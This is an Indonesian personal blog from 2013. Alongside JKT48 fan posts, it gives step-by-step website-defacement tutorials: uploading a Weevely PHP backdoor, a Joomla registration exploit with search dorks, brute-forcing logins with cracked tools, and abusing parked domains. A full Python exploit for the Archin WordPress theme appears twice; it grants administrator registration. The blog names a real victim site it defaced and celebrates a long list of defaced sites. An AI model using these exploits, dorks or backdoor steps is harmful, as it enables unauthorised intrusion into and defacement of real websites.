Jumat, 30 Agustus 2013

Tutorial BackConnect Dengan Weevely | in Windows

Posted by Erza Jullian 14.21, under | No comments

Meskipun baru nyoba tadi, saya share aja deh. Sekalian biar tutornya kesimpen di blog. Biar enak kalo mau nyari-nyari lagi. Hehehehehe. Agak pusing nyari tutor Back Connect rata rata suruh pakai Netcat . Nah, apesnya, mungkin karena saya yang bego, ditunggu sampai satu jam gak mau connect ke server, padahal command-command yang saya jalankan sudah betul :(

Oke langsung s aja, gak usah basa-basi :p .

Bagi yang belum punya, download dulu bahan-bahannya :

Python

Python Read Line

Weevely



Install semua bahan diatas.

Untuk Weevely, saya ekstrak di direktori C:\tools\weevely\ . Jadi nanti command commandnya ngikutin sendiri ya :p

Pertama , buka CMD, arahkan ke folder tempat sobat mengekstrak weevely tadi .

cd C:\tools\weevely

Lalu kita coba membuat file php dengan perintah main.py -g -o namashell.php -p password

contoh : main.py -g -o akicha.php -p akicha

Tunggu sampai proses selesai. Lihat SS :




Step 1

Buka folder weevely, pasti ada file akicha.php, lalu upload ke web target. Di public_html saja biar gampang




Step 2

Langkah ke tiga, masukkan command berikut :

main.py -t -u http://target.com/akicha.php -p akicha

Tunggu sampai proses selesai :)



Sip, backconnect sukses.

Simpel kan ? :D

Bagaimana kok saya tau kalo backconnect sukses ?

Saya test dengan menggunakan fingsi wget

wget http://newbieakicha.tk/x.txt



Hasilnya ?

http://sitotis.net/x.txt




wew, orang ganteng >.<

Sebenarnya tutorial ini adalah awalan saat kita ingin melakukan roting . Cuman karena saya belum bisa rooting, tutorial cukup sampai disini saja :p . Doakan supaya cepat bisa ngeroot server :3

Kamis, 29 Agustus 2013

Deface Dengan Exploit Joomla Com_User

Posted by Erza Jullian 16.00, under | No comments

Oke, sebenarnya ini cara lama sih :v . Tapi karena saya bari kemarin tertarik untuk menggunakan exploit ini, jadi ya baru sekarang saya share di blog . :v . Oke, langsung saja sob .

Bahan bahan yang di perlukan :

Joomla Exploit Com_User (save dengan format html)

Dork : intext:Joomla! is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds of thousands of visitors site:com (kembangkan sendiri)

Exploit : /index.php?option=com_users&view=registration

Oke, mulai dorking di google :p . saya ambil contoh askandans.com . Lalu masukkan exploitnya www.askandans.com/index.php?option=com_users&view=registration

Maka anda akan dibawa ke halaman registrasi :



Coba ctrl+u , lalu ctrl+f . cari kata hidden" . Cari kode seperti di bawah :





Sekarang, buka file html exploit joomla yang sudah sobat download tadi, isi data-datanya dengan benar :



Jangan lupa juga sesuaikan code yang tadi sudah anda dapatkan :





Lalu buka file html nya lewat browser, klik register :











Sukses !







Tinggal cek email, dan aktivasi :



Tinggal login dengan user dan password tadi :







Sekarang terserah anda mau diapain . hahahahaha

Sekian dan semoga bermanfaat :)

Selasa, 27 Agustus 2013

Istilah Istilah Dalam 48 family

Posted by Erza Jullian 16.04, under , | No comments

Oke, mungkin yang udah lama ngefans JKT48 atau fans dari 48 Family, sudah tau dengan istilah-istilah di bawah ini. Tapi bagi fans baru, sepertinya harus mengetahui istilah-istilah berikut :)

Oke langsung saja :



WOTAGEI

sorakan atau gerakan khas fans idol grup saat menonton pertunjukan idolanya. Untuk macam-macam jenis dan gerakannya bisa dicari dengan mesin pencari google.





MIX

salah satu unsur dari wotagei adalah Mix. Ini adalah bentuk sorakan khas yang dilakukan para fans idol grup pada bagian-bagian tertentu lagu ketika menonton pertunjukan idolanya. Mix bukan cuma milik fan AKB48 saja, tapi sudah lama mengakar di kalangan fans idol grup sejak mid 90�an. Untuk bahasan lebih detil tentang Mix bisa dicari ke sumber lain karena akan terlalu panjang bila dibahas disini.



OSHIMEN

oshimen (????) terdiri dari dua kata, �oshi� dan �men�. Oshi berarti �push/support� dan Men adalah singkatan dari �menba� (member dalam arti bahasa Inggris). Kata ini mempunyai arti member yang paling Anda dukung. Dalam banyak kasus, seorang fans bisa mempunyai banyak member favorit, tapi pasti ada satu diantara member tersebut yg paling disukai atau tidak tergantikan, inilah yg disebut dengan istilah kami-oshi.



OSHIHEN

kondisi dimana Anda merubah oshimen. Hal ini sering dianggap kurang sopan bagi bekas oshimen Anda.



SENBATSU

dalam bahasa Indonesia berarti pilihan/seleksi. Sebagai grup yg mempunyai jumlah member banyak, maka terasa perlu untuk dibuatkan barisan representatif dari sekian banyak member yang ada. Mereka inilah yg disebut sebagai senbatsu. Biasanya mereka dipilih berdasarkan popularitas di kalangan fans. Keuntungan dari member senbatsu adalah hak mereka untuk tampil di PV utama, media (majalah, TV show, event, dsb), dan tentu saja popularitas.



SENBATSU SOUSENKYO

Senbatsu sousenkyo: sejak tahun 2009 AKB48 rutin menggelar senbatsu sousenkyo (pemilu senbatsu) sekali setahun yang bertujuan memberi kesempatan bagi para fans untuk menentukan sendiri member senbatsu mereka. Caranya adalah memberi vote untuk member favorit mereka, dengan mengumpulkan tiket vote yg mereka dapat di single tertentu (biasanya satu single sebelum single sousenkyo). Tentu saja pembelian multi kopi adalah sah, dan satu tiket vote dihitung satu suara.



JANKEN SENBATSU

ini adalah salah satu ide �nyeleneh� yg diciptakan Aki-p untuk menentukan senbatsu AKB48. Caranya adalah dengan melakukan janken (suit jepang). Event khusus akan diadakan untuk hal ini, dimana disana akan diadakan sistem turnamen, satu persatu member yg kalah akan gugur hingga didapat pemenang utama yg nantinya akan mendapat posisi terdepan.



UNDERGIRLS

istilah ini dipakai untuk para member yang posisi popularitasnya dibawah senbatsu. Biasanya member yg termasuk disini adalah mereka yg punya popularity rank nomor 20 kebawah hingga sekitar angka 40. Urutan ini tentunya bisa berubah tergantung dari berapa banyak jumlah senbatsu yg ditentukan untuk sebuah single.



KAMI7

Kami berarti dewa. Istilah ini diciptakan para fans karena ada beberapa member yg memang ranking popularitas mereka tidak pernah tergoyahkan sejak lama di AKB48. Ketujuh orang itu adalah Atsuko Maeda, Oshima Yuko, Shinoda Mariko, Tomomi Itano, Watanabe Mayu, Kojima Haruna, dan Takahashi Minami. Namun dalam sousenkyo terakhir muncul sebuah nama baru yg tiba-tiba merusak tatanan tradisional 7 besar tersebut, yaitu Kashiwagi Yuki. Sejak saat itu istilah Kami7 oleh beberapa kalangan mulai banyak dipelesetkan menjadi Kami8. Akankah Sashihara Rino atau Matsui Rena sebentar lagi mengubahnya menjadi Kami9? Biar waktu yg memberi jawabannya kepada kita



JIKOSHOUKAI

ini adalah self introduction dari masing-masing member. Tentunya memiliki sebuah line khusus untuk introduksi bukanlah sebuah keharusan, tapi jika seorang member mempunyai jikoshoukai ciri khas mereka masing-masing maka ini akan memberi nilai lebih dimata fans.



Renai kinshi: Love is forbidden.

Ini adalah salah satu golden rule dalam dunia idol Jepang, dan termasuk yang paling keras untuk ditaati. Bahkan hanya sebuah foto dengan seorang pria, apapun status pria tersebut, bisa membuat karir seorang idol tamat seketika akibat kecaman para wota garis keras yg ingin idola mereka menjaga image pure dan innocent. Abide the rule, girls (or I might say, don�t get caught� LOL)!!



STAGE SONG

lagu yg terdapat di Stage masing-masing tim



UNIT SONG

lagu Stage yang dinyanyikan oleh formasi member tertentu (bukan seluruh tim), biasa terdiri dari 1 member popular didampingi oleh 2-4 member lainnya, dan letaknya beruntun 4-5 lagu ditengah setlist Stage.



UNIT SHUFFLE

biasanya hanya dilakukan di konser-konser besar, dimana Unit song yg identik dgn susunan member tertentu diacak dan diganti formasinya dgn member lain untuk elemen kejutan.



KENKYUUSEI

research student, atau bahasa mudahnya tim cadangan. Peran mereka biasanya untuk menggantikan spot member tetap yang tidak bisa hadir pada hari pertunjukan teater. Tapi seiring dengan melonjaknya popularitas AKB48, sekarang para kenkyuusei juga bisa dibilang mempunyai barisan fans yang tidak sedikit. Biasanya ada semacam kecenderungan unik dari para wota senior untuk oshihen kepada mereka, mungkin karena mereka melihat member yg popular sudah tidak perlu lagi didukung, sudah bosan, atau karena melihat para kenkyuusei inilah yg justru paling aktif berada di teater, tempat dimana AKB48 memulai segalanya dari nol, ketimbang senior mereka yg sering berhalangan karena urusan luar.



Oke, sekian postingan kali ini, semoga bermanfaat :)

Minggu, 25 Agustus 2013

Deface Fake Subdomain Dengan Memanfaatkan Hosting Gratisan

Posted by Erza Jullian 14.48, under | No comments

kali ini saya akan share trik deface subdomain dengan memanfaatkan hosting gratisan :p . Yaitu memanfaatkan fitus Parked Domain. Oke langsung saja ya bro :) .

Pertama, kita harus punya akun idhostinger dulu. kalo belum, ya buruan buat :v (bukan idhostinger juga gak apa-apa, sesuaikan sendiri)

Lalu, pergi ke Reverse IP Lookup untuk melihat domain-domain lain yang satu server denagn domain kita.

Sebagai contoh, punya saya : newbieakicha.tk




Step 1

Ya, cantik.us berada satu server dengan newbieakicha.tk .Sekarang kita coba membuat fake subdomain di cantik.us :D

masuk ke akun idhostinger, buka fitur Parked Domain , lalu masukkan subdomain.situstarget.com . Contoh, naomi.cantik.us . lalu klik park domain.




Step 2

Done ! buka naomi.cantik.us , maka tampilannya akan sama seperti tampilan newbieakicha.tk



Sekian tutorial kali ini, semoga beranfaat :)

Refrensi

Sabtu, 24 Agustus 2013

Archin WordPress Theme 3.2 Unauthenticated Configuration Access Vulnerability

Posted by Erza Jullian 11.51, under | No comments

Selamat datang di blog IDCA :D
langsung saja deh, neh saya share trik Deface "Wordpress Theme Archin", tapi karena saya males ngetik jadi saya copas aja blognya si Mr Xenophobic. Ijin ya om XD XD


ok lanjut. berikut tool yang dibutuhkan :

 Python 










install Python, setelah selesai menginstall python, buka notepad dan paste script berikut :

 # Exploit Title: Archin WordPress Theme Unauthenticated Configuration Access
# Date: Sept 29, 2012
# Exploit Author: bwall (@bwallHatesTwits)
# Vendor Homepage: http://themeforest.net/user/wptitans
# Software Link: http://themeforest.net/item/archin-premium-wordpress-business-theme/239432
# Version: 3.2
# Tested on: Ubuntu
import httplib, urllib

#target site
site = "target website"
#path to ajax.php
url = "/wp-content/themes/yvora/hades_framework/option_panel/ajax.php"

def ChangeOption(site, url, option_name, option_value):
    params = urllib.urlencode({'action': 'save', 'values[0][name]': option_name, 'values[0][value]': option_value})
    headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
    conn = httplib.HTTPConnection(site)
    conn.request("POST", url, params, headers)
    response = conn.getresponse()
    print response.status, response.reason
    data = response.read()
    print data
    conn.close()
     
ChangeOption(site, url, "admin_email", "emailmu")
ChangeOption(site, url, "users_can_register", "1")
ChangeOption(site, url, "default_role", "administrator")
print "Now register a new user, they are an administrator by default!"
save filenya dengan berekstensi .py 
lalu cari target website dengan mengunakan dork berikut :

 /wp-content/themes/*/hades_framework/
/wp-content/themes/felici/hades_framework/
/wp-content/themes/averin/hades_framework/
/wp-content/themes/shotzz/hades_framework/
/wp-content/themes/KLR/hades_framework/
/wp-content/themes/yvora/hades_framework/

disini saya anggap anda sudah menemukan targetnya.

buka websitenya, trus di pencet CTRL+U, dan akan muncul tab baru, seperti dibawah ini :
 setelah itu, kita klik url 
http://site.com/wp-content/themes/temanya/style.css
dan ganti style.css menjadi hades_framework/option_panel/ajax.php.
sehingga menjadi seperti ini :
http://site.com/wp-content/themes/temanya/hades_framework/option_panel/ajax.php
 jika website itu blank / tidak ada text apapun berarti itu vuln.
setelah itu buka start ~> Run ~> ketik "cmd" (akan muncul sebuah console / command prompt)

ketik "cd C:\" (karena script yg diatas saya letakkan di local disk)
ketik lagi "filenya.py" dan pencet enter. sehingga menjadi seperti ini :
jika muncul gambar seperti itu, tandanya itu berhasil. dan sekarang yang kita butuhkan adalah registrasi ke target website dengan menuju ke http://targetnya.com/wp-login.php trus klik register (setiap website berbeda bahasanya) untuk itu coba lihat screenshot berikut :
yang digaris merah itu, dalam bahasa inggris adalah register.
nb : jika tidak ada tombol register, brarti website itu mendisablenya.
dan lakukan registrasi seperti biasanya
nb : form yg atas adalah form username dan yg dibawahnya ada form email.

setelah melakukan registrasi, silahkan kalian cek email kalian yg sudah kalian isi di script.
ada kan ? klo ada buka email tersebut lalu buka login pagenya dan login dengan username tersebut.

Sumber : http://blog.xeno-info.tk/2013/08/archin-wordpress-theme-32.html

Deface Wordpress Dengan Exploit Archin WordPress Theme 3.2 Unauthenticated Configuration Access Vulnerability

Posted by Erza Jullian 05.27, under , | No comments

Oke, langsung saja ya bro, soalnya ane buru-buru mau malem mingguan :v . Ane prakteknya di Windows, jadi yang pakek linux ngikutin aja sebisanya. Bagi yang pake windows, wajib install Python dulu. Sttelah itu, buka notepad, dan pastekan script berikut :

# Exploit Title: Archin WordPress Theme Unauthenticated Configuration Access

# Date: Sept 29, 2012

# Exploit Author: bwall (@bwallHatesTwits)

# Vendor Homepage: http://themeforest.net/user/wptitans

# Software Link: http://themeforest.net/item/archin-premium-wordpress-business-theme/239432

# Version: 3.2

# Tested on: Ubuntu

import httplib, urllib



#target site


site = "situs.com"

#path to ajax.php

url = "wp-content/themes/archin/hades_framework/option_panel/ajax.php"



def ChangeOption(site, url, option_name, option_value):


params = urllib.urlencode({'action': 'save', 'values[0][name]': option_name, 'values[0][value]': option_value})

headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}

conn = httplib.HTTPConnection(site)

conn.request("POST", url, params, headers)

response = conn.getresponse()

print response.status, response.reason

data = response.read()

print data

conn.close()



ChangeOption(site, url, "admin_email", "akicha@jkt48-cyber.org")

ChangeOption(site, url, "users_can_register", "1")

ChangeOption(site, url, "default_role", "shintanaomi")

print "Now register a new user, they are an shintanaomi by default!"



Save di direktori C: dengan nama archin.py (untuk memudahkan saja) .

Langkah selanjutnya, dorking di google dengan dork berikut :

/wp-content/themes/vithy/hades_framework/ (kembangkan sendiri)

Setelah nemu target, coba di ctrl + u .





Lalu edit archin.py , sesuaikan dengan target diatas :D

ganti situs.com dengan basement-pa.de

ganti archin dengan vithy

ganti akicha@jkt48-cyber.org dengan email anda

ganti shintanaomi dengan user keinginan anda. :p



Langkah selanjutnya, buka CMD, lalu ketik cd\

Setelah itu, ketik lagi archin.py

Tunggu sampai proses selesai :D



Sekarang buka http://www.basement-pa.de/wp-login.php?action=register

Masukkan data, dan cek email , maka anda akan mendapat password nya :D





Sekarang coba login dengan user dan password yang didapat :D



Lolz, login sukses :v

Tapi bangke ni situs gak bisa edit themes -_-

Install plugins juga gak bisa :3

jadi ya gini aja deh :D

http://www.basement-pa.de/hacked/

Mirror



Sekian dan terimakasih :D

Thanks to : Gay MUHAMMAD TAREGH AZZIS

Jumat, 23 Agustus 2013

Hack Joomla Dengan Joomla Brute Force

Posted by Erza Jullian 14.57, under | No comments

Kali ini saya akan share salah satu metode hacking web joomla yaitu bruteforce. Sebenarnya ini cara lama sih. Tapi kebetulan kemarin teman saya tanya jadi sekalian buat postingan biar blog ada updatean :D .

Oke langsung saja, yang anda perlukan adalah :

Joomla Brute - Download Disini

Wordlists - Download Disini (jika punya yang lebih lengkap, tidak perlu download :p )



Langkah-Langkah :

Pertama, masukkan wordlist pada pass.txt dan situs target pada s1.txt <-- yang ini bisa diganti sendiri. Ex : sinka.txt , naomi.txt , terserah.




Step 1

Lalu, buka tools Joomla Bruter, load file s1.txt (file yang berisi target) , lalu klik scan . Lihat gambar :




Step 2

Tunggu sampai proses cracking selesai. maka hasilnya akan terlihat seperti gambar di bawah ini :




Password Cracked

Sekarang tinggal login ke situs target . :D




Login

Yeah, success bro... :D




Login Sukses


Sekarang terserah mau diapan. Kalo mau upload shell caranya ada disini :







Sekian dan terimakasih. :)






Kamis, 22 Agustus 2013

Download JKT48 - Setlist Fortune Cookie In Love

Posted by Erza Jullian 15.25, under , | No comments

Kali ini saya akan share setlist terbaru JKT48 , Fortune Cookie In Love . Langsung saja ya.

Ada tiga lagu didalamnya. yaitu :

Fortune cookie in love

First Rabbit

Baby� Baby� Baby� ( prayer passionate ver )

Langsung saja nih link downloadnya :

Fortune Cookie in Love

First rabbit

Baby� Baby� Baby� ( prayer passionate ver )



Thanks buat yang udah upload. Ane cuma share ulang. Biar fans yang gak bisa beli CD nya bisa ikut menikmati =))

Selasa, 20 Agustus 2013

Cara Menemukan Username dan Password pada Authentication Required dengan Bruteforce

Posted by Erza Jullian 16.17, under , | No comments

Sebenarnya saya sendiri bingung , apakah judul postingan saya  sudah benar :3 .Karena trik ini baru saya temukan liburan lalu. :D

Oke langsung saja. Biasanya kita sering menemukan web yang halaman loginnya menggunakan autentifikasi. Kadang web yang vuln SQLi, user, password, dan halaman login sudah ketemu namun ternyata halaman login dilindungi Authentication Required.



kali ini saya testnya di localhost saja ya :v . Maklum, lagi gak ada target. Saya coba dengan privat shell yang juga dilindungi Authentication Required.

Kira-kira tampilannya seperti ini :





Lalu bagaimana cara agar kita bisa login ?

Kita bisa mencoba melakukan bruteforce attack dengan menggunakan tools Accunetix. Yang belum tau tools Accunetix, silahkan cari sendiri di Google. Banyak kok yang sudah di crack :p .

Oke, langsung saja buka tools Accunetix Scanner, lalu pilih Authentication Tester.

Lihat gambar :





Lalu isi url, list user dan password.





Target URL to test : isi dengan url target yang akan dibruteforce

Username dictionary path : letak file .txt yang berisi list username. Silahkan sesuaikan sendiri

Password dictionary path : letak file .txt yang berisi list password. Silahkan sesuaikan sendiri

Lalu klik start untuk memulai bruteforce.

Tunggu sampai proses bruteforce selesai. Jika berhasil, maka hasilnya akan tampak seperti gambar dibawah ini :





Valid combinations :

http://localhost/shell/48.php with username "yuyud" and password "sinkajuliani" <-- jangan ditanya. Emang udah cocok dari dulu :p

Lalu coba kita login shell di localhost tadi dengan user : yuyud , pass : sinkajuliani .





Oke, berarti yuyud - sinkajuliani emang cocok 8|



NB : trik ini bisa digunakan di semua web yang menggunakan autentifikasi. Tidak hanya shell saja namun juga admin login dsb.

Trik bruteforce adalah teknik yang membutuhkan kesabaran karena kita mencoba login dengan mengecek semua kata/word yang sudah dimasukkan kedalam list. Semakin banyak wordlist, semakin besar kemungkinan kita untuk mendapatkan username dan password login.

Cara menghindari teknik ini adalah gunakan kombinasi huruf dan angka serta karakter yang susah untuk ditebak . =))



Sekian tutorial kali ini, semoga bermanfaat.




Minggu, 18 Agustus 2013

Cara Mudah Deface Index | Di Localhost

Posted by Erza Jullian 16.30, under , | No comments

Kali ini saya akan share tutorial yang mungkin berguna bagi para newbie seperti saya. Entah kenapa, biasanya orang yang baru belajar deface selalu penasaran untuk mendeface index suatu website. Padahal, defacer ternama seperti Hmei7 saja biasanya hanya menitip file indonesia.htm . Atau mungkin anda bisa melihat hasil dari defacer ganteng yang punya nick ./Akicha , dia hanya menitip file akicha.html. :v .



Oke, saya sumsikan sobat sudah menginstall localhost. Terserah mau pake apa. Saya pakai Xampp.

Pertama, jalankan Xampp Control Panel.

Jika sudah, coba buka browser dan ketik localhost di address bar. Maka akan diredirrect ke localhost/xampp .

Tampilannya seperti ini :





Dan misi kita kali ini adalah menghajar index localhost agar tidak diredirrect ke /xampp/ .

Sekarang sobat masuk ke direktori dimana sobat menginstall Xampp. Lalu masuk ke folder /htdocs/

Disana ada file index.html serta index.php yang berfungsi meredirrect localhost ke localhost/xampp .

Silahkan mau dihapus atau direname. Lebih baik direname saja yang penting kedua file tersebut tidak lagi berfungsi. Saya rename menjadi index2. Lihat gambar :





Lalu, Kita buat index.html baru yang sudah berisi script deface kita. Lihat gambar :







Oke, sekarang saatnya dieksekusi . :3

Buka browser, ketik localhost di address bar.

Horeeee !!!!!!!!!!!





Selamat, kalian berhasil deface index. Sekian tutorial kali ini, semoga rasa penasaran kalian terobati :)

Sabtu, 17 Agustus 2013

Inilah Cara Defacer Indonesia Rayakan Kemerdekaan

Posted by Erza Jullian 05.43, under ,, | No comments

Ya, hari ini tanggal 17 Agustus 2013. Dimana tepat hari ini bangsa Indonesia merayakan kemerdekaan Indonesia yang ke 68. Banyak cara dilakukan untuk memperingati hari kemerdekaan ini. Ada yang menggelar doa bersama, lomba kelereng, lomba makan kerupuk, dan masih banyak lagi. Begitu juga dengan para aktivis underground. Ratusan situs langsung tumbang terutama situs degara Malaysia, Belanda, Jepang. tampilan web berubah menjadi garuda Pancasila, teks proklamasi dan lain lain.




Hacked by ./Akicha




Hacked by Garuda Attacker




Hacked by Mr.RSI




Hacked by Ismail Attacker

Sebenarnya masih banyak. Seperti Penjaga Kuburan, ./Cyberfvcker, Panda-404 dan lain lain.



http://reddata.org/

http://1stopitsolution.net/

http://mybizmall.biz/x.php

http://krystalgraphics.com/x.php

http://suaraseniman.net/x.php

http://iskconkl.org/x.php

http://skytv2u.com/x.php

http://www.fernsofabd.com/

http://www.gfclbd.com/

http://4u2shop.com.my/

http://proventus.com.my/

http://suxcess.com.my/

http://www.4u2search.com.my/

http://www.organo.com.my/

http://www.vietnamflowers-group.com/

http://www.tandartspraktijkdekolk.nl/

http://www.veenendaal-associates.nl/

http://www.jeffreyscafe.nl/

http://www.manz-sa.ch/Red.php

http://www.sailarredamenti.ch/Red.php

http://www.microtorniturasa.com/Red.php

http://www.agna.ch/Red.php

http://www.capriaschese.ch/Red.php

http://mctrak.mctrans.com/Red.php

http://www.mariangela.novena.ch/Red.php

http://www.prosped.ch/Red.php

http://www.sailimmobiliare.ch/Red.php

http://www.energiegratitude.com/

http://urgencedentaire.net/

http://toncoachpersonnel.com/

http://bcpangkalpinang.beacukai.go.id/Merdeka.html

http://www.goodshape-fitness.be/joomla/

http://www.gekopwebdesign.nl/Joomla/administrator/

http://kayucinta.com/Merdeka.html

http://masjidwilayah.gov.my/

http://multiservicios.gov.co/

http://cojudeq.gob.mx/cojudeq/merdeka.htm

http://pas-kol.co.il/merdeka.htm

http://oprinter.co.il/merdeka.htm

http://humanitariancaredp.org/merdeka.html

http://fastbulksms.com/merdeka.html

http://andeanmystique.com/merdeka.html



Itu hanya beberapa yang saya ketahui. Sebenarnya masih banyak.

Bahkan ./xCrotZ berhasil mendeface 836 situs !!!

836 Website Hacked by xCrotZ | Happy Birthday Indonesia



Sekian postingan kali ini.

MERDEKA !!!!!


Kamis, 08 Agustus 2013

Minal Aidzin Wal Faidzin | Mohon Maaf Lahir dan Batin

Posted by Erza Jullian 00.50, under | No comments

Mungkin ada beberapa postingan disini ada yang secara sengaja ataupun tidak menyinggung hati para pembaca.

Oleh karena itu, di hari yang suci ini saya selaku admin Madura Cyber mengucapkan :



MINAL AIDZIN WAL FAIDZIN, MOHON MAAF LAHIR DAN BATIN :)

Sabtu, 03 Agustus 2013

Download JKT48 - JKT48 | Clean Version

Posted by Erza Jullian 17.53, under , | No comments

kali ini saya akan share salah satu lagu JKT48 yang berjudul JKT48. Agak susah juga nyari yang clean mengingat memang belum keluar album/single nya. Untung kemarin nemu di soundcloud. Bisa dibilang 95% clean. :D . Yaudah, langsung saja.

Ini lirik Lagunya :



Yang menarik di Jakarta Monas Ancol dan Dufan

Taman Ismail Marzuki Planetarium

Datang ayo datanglah ke FX Sudirman



Berjalan keliling Taman Mini

Yang di situ Gelora Bung Karno

Datanglah dan yang ada di sana

Di sana ada perempuan pun pergi ke shopping mall



Bundaran HI Kemang Kuningan

Senayan sampai Mangga Dua



Kami Jakarta Fourty Eight

Ayo datanglah dan temui kami

jadilah hal yang kami semua

Kami mohon

RIght? Right?



Kami Jakarta Fourty Eight

Ayo datanglah dan temui kami

Kami semua mengejar mimpi di tempat ini

Tolong dukunglah kami



Kami Jakarta Fourty Eight

Kami Jakarta Fourty Eight

Kami Jakarta Fourty Eight

Kami Jakarta Fourty Eight





Ini link download nya :



Download JKT48 - JKT48 | Clean Version



Sekian post kali ini.Semoga bermanfaat